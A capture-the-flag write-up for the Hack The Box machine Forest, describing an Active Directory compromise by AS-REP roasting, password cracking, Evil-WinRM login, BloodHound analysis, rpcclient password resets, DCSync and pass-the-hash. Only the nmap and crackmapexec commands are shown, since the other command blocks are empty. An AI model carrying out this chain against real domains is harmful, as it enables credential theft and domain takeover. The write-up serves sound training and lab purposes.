search
Read BlogpostsLet's Connect

Forest

hashtag
Summary

  • The machine was vulnerable to AS-REP roasting, and we found that svc-alfresco had Do not require Kerberos preauthentication enabled.

  • Extracted the AS-REP hash using GetNPUsers and cracked it with John to retrieve the password: s3rvice.

  • Used Evil-WinRM to log in as svc-alfresco and got the user flag.

  • Ran BloodHound and discovered:

    • svc-alfresco has ownership over users kyle and rdiaz.

    • kyle has DCSync rights over the domain.

  • Reset the passwords for both kyle and rdiaz using rpcclient.

  • Performed DCSync attack using kyle to dump Administrator's NTLM hash.

  • Used that hash with Evil-WinRM to gain an elevated shell and grab the root flag.

hashtag
Enumeration

sudo nmap -A -sC -sN -p- -oN forest_tcp.nmap -T4 10.10.10.161

hashtag
Enumerating SMB

crackmapexec smb 10.10.10.161 --users

Discovered valid users:

Checked for AS-REP roasting:

Found:

Cracked it with:

Recovered password:

hashtag
Initial Foothold

Used Evil-WinRM to connect:

User shell landed — ✅ Got user flag!

hashtag
Privilege Escalation

Ran BloodHound using bloodhound-python:

Key Finding:

  • svc-alfresco owns:

    • kyle (has DCSync rights)

    • rdiaz (has special access in Forest.HTB.local)

Used rpcclient to change passwords of owned users:

Performed DCSync attack:

Dumped the Administrator’s hash:

Used it to log in with Evil-WinRM:

Got SYSTEM shell — 🎯 Grabbed root.txt!

PreviousArcticNextActive

Last updated